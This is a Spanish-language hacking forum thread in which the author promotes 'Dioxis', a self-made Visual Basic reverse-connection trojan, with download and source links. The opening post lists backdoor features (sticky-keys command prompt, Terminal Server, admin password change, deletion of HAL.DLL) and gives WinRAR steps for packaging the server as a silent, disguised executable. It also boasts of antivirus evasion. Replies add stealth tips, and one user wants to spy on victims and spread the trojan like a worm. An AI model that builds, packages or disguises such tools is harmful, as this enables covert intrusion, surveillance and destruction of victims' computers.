Foro de elhacker.net

---

Tamaño servidor: 408 KB (Compilado con Winsck.ocx & dioxis.exe(servidor))
Tamaño Cliente: 544 KB
Archivos: Cliente Dioxis y libreria winsck.ocx
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: 666
Infraestructura: Red Local e internet

---

Ejecucion de:

• Paint
• Teclado Universal
• Buscaminas
• Solitario
• Pinball
• Calculadora
• Paseo de Win Xp
• Star Wars
• Mensajes personalizados
• Paginas Web

Matanza de Procesos:

• Messenger
• Navegadores (Firefox,Iexplorer,Safari y Opera)
• Explorador de Windows
• Proceso Personalizado

Creacion de Puertas Traseras:

• Habilitar terminal server
• Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
• Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

• Edicion de la contraseña de administracion a la que se quiera
• Cierre de Sesion
• Apagar Pc
• ELIMINAR HAL.DLL (No se iniciara windows si no es reparado :/ )

---

Dioxis, a pesar de su simple interfaz, es un troyano de conexion inversa.

Utiliza la funcion shell, para ejecutar acciones, estas acciones estan divididas en 4 partes:

Modo Custom: Es el modo personalizado, si tienes ya conocimientos de lo que puedes hacer con "Ejecutar:" puedes escribir tus ordenes aqui para que sean procesadas en el ordenador remoto

Modo Funny: Es el modo divetido ^^. Puedes haces acciones tales como ejecutar paint, mandar mensajes, ponerle la tipica pelicula de star wars en modo ascii...etc


Modo Normal: Este modo esta dedicado a la matanza de procesos que corren en el pc remoto y a abrir paginas web o cerrar sesion, un poco mas cruel que el funny mod


Modo Dioxis: El dioxis mod, seria en teoria la forma mas cruel de usar este software, consta ge generar backdoors, apagar el pc, eliminar el hal.dll...etc

He evitado en este modo hacer las cosas crueles ya que este software aun no es detectado ^^ abstenganse gente cruel :P



Aqui os dejo unos minutos de la demostracion del troyano, es la 1 version, no la actualizada, pero no cambia mucho



El unico antivirus que hasta ahora me ha dado algun problema es el poco conocido avira, que lo detecta por heuristica pero te deja seguir trabajando con el, asi que si tienes una buena ingenieria social, podras colarselo, a continuacion los antivirus pasados:


Por ahora esos antivirus son con los que lo analize, si deseais que lo analize con otros me comentais

• Añadida la funcion de eliminar Servidor y crearlo con el cliente
• Ahora el tiempo de reconexion se configura al crear el server, igual que la ip
• No hará falta conectarse y desconectarse al pasar entre modos[/b]

El Troyano consta de cliente y servidor, el servidor se crea con el cliente, y puede que necesite de la libreria de winsock (viene adjuntada con el software), asi que una vez creado el server seguid estos pasos:

1: Instalar el WINRAR (http://www.winrar.es/descargas) y coged los archivos servidor y la libreria

2: Una vez tenemos el servidor y la libreria, cogemos los dos y con el winrar y le damos a añadir archivo, nos aparecera una ventana asi:


Le dais a crear archivo ejecutable o en mi caso a create sfx archive, el metodo de compresion que sea el mejor

3: A continuacion vete a la pestaña avanzado, te aparecerá esta ventana:


te vas a opciones de autoejecutable o sfx options

4: Te volvera a salir otra pestaña para poder decir el directorio en donde se instalara, y que se ejcutara antes o despues de la extraccion, rellenar segun la imagen


5: En la pestaña modos, selecciona segun la imagen, sobreescribir archivos y esconder todo


6: En esta pestaña podreis cambiar el icono de la aplicacion, luego das a aceptar todo y ya tendreis vuestro server

---

(http://img29.imageshack.us/img29/4756/descargarw.png) (http://www.fileden.com/files/2008/3/2/1791774/di0xis.rar)

(http://img268.imageshack.us/img268/5946/descargar2.png) (http://www.fileden.com/files/2008/3/2/1791774/iconos.rar)

Descargar codigo fuente
 (http://www.fileden.com/files/2008/3/2/1791774/codigo%20fuente.rar)

Te felicito, al final lo has conseguido. :)

yeah, me costo pero si, aun asi me falta mejorarle unas cosas ya que cuando se descoencta el servidor, el cliente no muestra la desconexion, fallo grave

No lo he provado, pero que tu interfaz mola mola!, y esta bien xhio esto Modo Dioxis XD

 :D

Buen curro!

Me gusta la interfaz... como se llama el Oso Rosa ese? ;D

Lo que no me gusta es que cada vez que cambias de sección has de escuchar... porque? :xD

Bueno, ahora preguntas especificas:

• Peso del Stub?
• Espacio entre cada reintento de conexión al cliente?
• Lenguaje? VB6.0?

Sigue así, llegarás lejos ;)

Saludos ;D

PD: Para la próxima pon algún TextBox más :xD, Me refiero para preguntar,por ejemplo, el proceso a ser eliminado, no solo los que tengan los botones ;)

si te refieres al numero de fichero que necesita, pues nada mas el server y el ocx del winsock para el que no lo tenga, esta compilado con el winrar jaja

El espacio es de 10 segundos, esta hecho con un timer pero vamos que se puede agrandar si el numero de clientes es elevado

si, lenguaje vb, con la version del programa 6.0 jaja eso sobraba pero weno


a mi tampoco me gusta lo de que se reconecta todo el rato, porque como son diferentes formularios tuve que hacer diferentes controles winsock para cada uno, eso no sabia como arreglarlo ains

el oso rosa asesion es el famoso gloomy miren jeje:

http://images.google.es/images?client=firefox-a&rls=org.mozilla%3Aes-ES%3Aofficial&hl=es&q=gloomy&btnG=Buscar+im%C3%A1genes&gbv=2&aq=f&oq=

porcierto puse una duda en vb6, quiero que el cliente genere el servidor, es decir que puedas cambiar la ip a la que va el servidor para que no todas vayan a m dominio no-ip, sino que la gente lo use para ellos, haber si me podeis ayudar y cuando acabe eso lo pongo

solucionado el error de que cuando el usuario se descnecta, no avisaba

Nunca pensé que vb podía llegar a ser tan peligroso junto a tus manos.  :o Congratulations! ;-)

Lo de la versión del VB no sobraba, ya que esta VB .NET :P

Cuando digo Peso me refiero a los KB que ocupa... si va todo empacado con WinRar... seran unos 20kb? :-\

 ;)

Cualquier persona con un mínimo de dedicación puede hacer lo que se plantee en casi cualquier lenguaje :)

 ;) Ahora queda corroborado que a vb no hay que menospreciarlo...

batch tambien es menospreciado, y solo estamos hablando de batch, hay gente que hace juegos convoy a poner mas datos del software, entre ellos el peso y demas

bua..simplemente perfecto! estoy deseando de poder descargarlo :D:D

felicidades por el aporte y muxas gracias

1 saludo

ahber si consigo crear en el cliente el servidor y sera todo vuestro, pero no lo subais a virustotal, y si vuestro antivirus envia los datos al servidor, no lo analizeis tampoco

http://foro.elhacker.net/index.php/topic,171824.0.html

Buen trabajo, para ser tu primer proyecto no pinta nada mal ;)

Puedes escanear el server aquí:
http://scanner.novirusthanks.org/index.php?options=1

Marcando la opción de no distribuir sin ningún problema (en cuanto la web esté on)
Salu2

he visto el proyecto que has hecho ese que muestras en tu post eon, pero no entiendo mucho, en ese que generas el servidor desde el cliente?

eso es lo que deseo yo

quiero poner en el cliente un boton que te pregunte, a que ip quieres vincular el server?, pones una y te genera el server con esa ip, pero ahi no llego a entender mucho, haber si me puedes ayudar

Lo que tienes que hacer es guardar el servidor en los recursos del cliente, cuando quieras generar un servidor lo extraes y le añades al final (en el EOF) la ip, el puerto o lo que tu quieras y luego desde el servidor lees esa información y la utilizas ;)

muy bueno, S0l3r, solo vi el programa una vez en foto y me gusto, cuando lo vi en accion en el video, me kedao flipao =D ... te a kedao perfecto ;)

Inconvenientes: al parecer no es multiconexión, tiene opciones inutiles para lamear y al parecer lo has hecho casi sacandolo de los pappers que circulan por ahi no? añadiendole un aspecto visual eso si.

Como trabajo para aprender está bien, pero de ahí a querer publicarlo en plan "aquí teneis mi troyano" lo veo exagerado.

k-19 hablar es facil, donde esta el tuyo???
muy buen trabajo un poco cruel algunas opciones pero muy buen trabajo XD

Pues a pesar de lo que se diga, a mi me parece un trabajo genial, y con muchos puntos a favor: Interfaz agradable, extremadamente ligero y sencillo, indetectable...
Te felicito por tu esfuerzo chaval, un proyecto realmente bueno.

K-19, si te fijas en la primera imagen que hay en el post inicial dice 'BIENVENIDO A LA SENCILLEZ' asi que, entiendo que no se quieres hacer un PoisonIvy/Bifrost/SpyNet... :laugh:

Saludos ;)

aji estamos jeje, he empezado hace 2 semanas en este mundillo, me lei entero el manual de aprenda vb como si estuviera en primer y de ahi en adelante empecé  a investigar yo solo

el troyano no esta hecho siguiendo un tutorial, lo que si, me inspiro el manual de Xenon, unicamente la primera parte, aun sigo leyendo el tutorial pero lo sigo por mi parte, como un manual mas y no copiando el codigo, y si hay alguna parte que no se investigo hasta dar la causa

---

Tengo esto en mente para que el cliente me genere el server clicando en un boton

Que por un inputbox te pida la ip a la que se vaya el server y luego genere todo el server en un exe y luego lo guarde en una ruta con un common dialog

pero como hago para guardar unicamente el server al darle al boton?

para resumir, quiero hacerlo como el bifrost, que te genere el cliente el servidor

Mi pregunta es porque se reinicia la conexion cuando pasas al modo funny? (asi aprecie el video)...
y que pasa cuando tienes 10 victimas que quieren conectarse? implementa las multiples conexiones al estilo poison ivy, bifrost ... seria mejor ;)

Pondre para que podais cambiar el intervalo del timer, por si teneis muchos pcs remotos

luego el corte de conexion, eso se debe a que no puedo controlar los 4 formularios con un winsock control, sino no se cortaria

Claro que puedes...

Form1.Winsock1.Close

:rolleyes:

muchas gracias por la sugerencia, ya lo arregle

ya esta activa la descarga

Buen trabajo ;D Por lo visto te gusta el Diseño Gráfico xD... haces imágenes para todo :laugh:

Mis sugerencias:

• Usa el API de Winsock envez de el OCX (CSocketMaster)
• Utiliza el Estilo de W$ para los botones (MANIFEST)
• Deberías advertir que se crea el servidor apretando en la Mariquita :xD
• Deberías reducir el tamaño del Stub (P-CODE, ALIGN....)
• cifra las cadenas de la configuración...
• cifra las cadenas enviadas...
• Ejecuta el TaskKill que usas para matar procesos de forma oculta... canta mucho...

Bueno, creo que nada mas... :P

Por cierto, que hace lo de BackDoor?

Saludos ;)

aun me meti en vsual basic, tengo que aprender un poquito mas para cifrar todo el trafico

luego el estilo de w$ cual es? no se de su existencia jeje, soy noob

en usar el api del winsock a que te refieres

el taskkill porque canta?


gracias por dar tu opinion, ayudas a que mi software evolucione ^^

por cierto el mensaje al crear el server sale:


justo cuando le das a la mariquita, ademas tienes otra oportunidad despues de poner la ip y el tiempo de reconexion, te enseña los datos si dices si lo crea sino no

Te digo lo del Estilo de Windows... (W$).. porque los que no tenemos temas como el tuyo (El de Mac) nos salen los botones tipo Windows 95... así que mírate esto:

Saludos ;)

bueno, pongo el codigo fuente, que me dijo eon que lo tenia que poner

Si estas aprendiendo es bueno que lo pongas, a lo mejor alguioen qe tiene tiempo se da el trabajo de leerlo y sugerirte mejores cosas...

Por cierto, tambien puedes usar una matriz de Winsock para hacer multiples conexiones a la vez

Buen Proyecto 50l3r, me fije bien y los comentarios son viejazos  :-(
-
Pero igual sigue siendo indetectable jajajaja....  he visto troyanos de paga y que no menos de 4 semanas ya todo antivirus lo detecta, y este dioxis es gratis, y casi nadie lo conoce y como dura el microbio jajajajajajja... aguante dioxis
--------------------------------------------------------------------------
 ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)
------------------------------------------------------------------------------

Bueno antes que nada felicitar al creador por este impecable, sencillo y efectivo SOFT. Un lujito la verdad ya lo he provado y funciona.

El server por ahora lo prove con NOD 32, y es indetectable por este. Me preguntaba si se podria de alguna manera hacer que este server , se ejecutara cada vez que la victima iniciara sesion en el PC ? , y se que se puede, asi que voy a intentarlo. Si a alguno se le ocurre algo rapido y efectivo agradecido estoy.

Porque la verdad lo que mas me interesa es espiar a la victima y no tanto perjudicarla o darle a conocer que esta siendo espiada.

Taria bueno agregar funciones tales como, observar su camara web y su escritorio y cosas asi, mas privadas ^^ ! . Sin mas saludos y gracias.

este troyano ya va por la version 5 jejeje

esta es la primera si no me equivoco

http://foro.elhacker.net/analisis_y_diseno_de_malware/vb_dioxis_trojan_conexion_inversa_by_50l3r-t255645.0.html;new;topicseen#new

aqui tienes la utlima, tiene mas cosas y etc, la primera version estara detetadisima, o eso creo ya que no lo uso

Jaja sii, luego de descargarme este, seguir recorriendo el foro y vi la version 5 lite que porsupuesto , descarga y probe , y aun mas contento quede !! (rima  y todo ). Re bueno el soft.

PD: Yo fui el del mail del ocx, aunque me di maña y lo arregle (por suerte , ya que era una boberia), aunque luego entre al la casilla y vi que me habias dado ya la solucion jajaj !!  un groso !!. Saludos.

No tengo muchos conocimientos de troyanos, pero bueno ! estoy a pasos de terminar la carrera Analista Programador y no es que diga algo con esto, solo que algo se ! ^^.

PD2: Seria posible blindarle al servidor algun codigo como para que se agregue al registro, y se inicie a cada inicio de sesion de la "v1ctima".?

Si logro hacerlo luego tengo pensado tambien agregarle algun codigo estilo w0rm, para que se propague por unidades extraibles jeje !, bue se me ha abierto un abanico de ideas jeje !!

Saludos.. me pondre en carrera !!

xd el server se ejecuta en cada inicio

xD, todas las versiones lo hacen, solo que no se agrega al registro :P

Hola, disculpa soy nuevo en esto, ya descargue los archivos, pero no puedo hacer que arranque, como creo el server?? podrias ayudarme porfa, de antemano muchas gracias. =)

Ayuda por favor!!! No puedo crear el server, =(  ya me decspere!!! alguien que me ayude gracias.  :(

esto es la primera version, actualizate, entra en la web oficial ya que la version mas reciente no se encuentra aqui

descarga este archivo de internet: comdlg32.ocx

la pagina es 50l3r-labs.skimdoo.com

y por cierto, no revivas posts viejos, basta con crear uno nuevo

saludos

Cierro el tema, cualquier duda le enviais un MP al creador ;)